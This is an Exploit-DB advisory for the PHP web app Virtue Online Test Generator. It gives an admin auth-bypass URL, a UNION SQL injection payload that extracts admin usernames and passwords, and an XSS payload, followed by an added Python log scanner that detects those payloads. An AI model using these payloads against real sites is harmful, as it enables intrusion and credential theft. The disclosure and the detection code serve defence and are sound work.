Exploit Virtue Online Test Generator - Authentication Bypass / SQL Injection / Cross-Site Scripting

Exploiter

18 Dec 2022
EDB-ID: 9022
EDB verification: Passed
Author: HXH
Vulnerability type: WEBAPPS
Platform: PHP
CVE: CVE-2009-2393, CVE-2009-2392, CVE-2009-2391
Publication date: 2009-06-26
Code:
+===================================================================================+
|                                                                                   |
| Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities         |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Author.: HxH                                                                      |
| Contact: HxH[at]live[dot]at                                                       |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Script.: Virtue Online Test Generator                                             |
| Home...: http://www.virtuenetz.com/virtue_test_generator.php                      |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| Exploit: After user login                                                         |
|                                                                                   |
| [+] Auth Bypass                                                                   |
|                                                                                   |
| http://[website]/[script]/admin/index.php                                         |
|                                                                                   |
| [+] SQLi                                                                          |
|                                                                                   |
| http://[website]/[script]/text.php?tid=[SQL]                                      |
|                                                                                   |
| [SQL]=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin--         |
|                                                                                   |
| [+] XSS                                                                           |
|                                                                                   |
| http://[website]/[script]/text.php?tid=<script>alert(1)</script>                  |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| Demo...: http://www.virtuenetz.com/exam                                           |
| Usrinfo: E-mail:[email protected] ~ Pass:demo                                   |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Greetz.: ~ Jiko ~ Sniper Code ~ T3rr0rist                                         |
|                                                                                   |
+===================================================================================+

# milw0rm.com [2009-06-26]
 
Source: www.exploit-db.com
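
For defenders reviewing web server logs for the `text.php?tid=` requests described in the advisory, the following is an added example (not part of the original advisory or the vendor's code). It assumes `tid` is normally a plain numeric test ID and that logs use the common/combined access-log format; the log lines, IP addresses and the `/exam/` path prefix in the sample are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; IPs are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Jun/2009:10:00:01 +0000] "GET /exam/text.php?tid=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Jun/2009:10:00:09 +0000] "GET /exam/text.php?tid=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin-- HTTP/1.1" 200 5342',
    '203.0.113.9 - - [26/Jun/2009:10:00:15 +0000] "GET /exam/text.php?tid=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4988',
    '198.51.100.20 - - [26/Jun/2009:10:01:02 +0000] "GET /exam/text.php?tid=abc HTTP/1.1" 200 4100',
    '198.51.100.7 - - [26/Jun/2009:10:01:30 +0000] "GET /exam/index.php HTTP/1.1" 200 2048',
]

LINE_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)
SCRIPT_RE = re.compile(r"<\s*script\b", re.I)


def classify_tid(value):
    """Return None for a plain numeric id (assumed normal), else an anomaly label."""
    if re.fullmatch(r"[0-9]{1,10}", value):
        return None
    if UNION_RE.search(value):
        return "sqli-union"
    if SCRIPT_RE.search(value):
        return "xss-script"
    return "non-numeric"


def scan(lines):
    """Return (client_ip, label, decoded_tid) for every suspicious text.php request."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/text.php"):
            continue
        # parse_qs URL-decodes the value ('+' to space, %XX to bytes) before matching
        for value in parse_qs(url.query, keep_blank_values=True).get("tid", []):
            label = classify_tid(value)
            if label:
                findings.append((m.group("ip"), label, value))
    return findings


if __name__ == "__main__":
    for ip, label, value in scan(SAMPLE_LOG):
        print(f"{ip}\t{label}\t{value!r}")
```

The same allow-list idea (accept only digits for `tid`) is what a server-side fix would enforce before the value reaches a query or the HTML response.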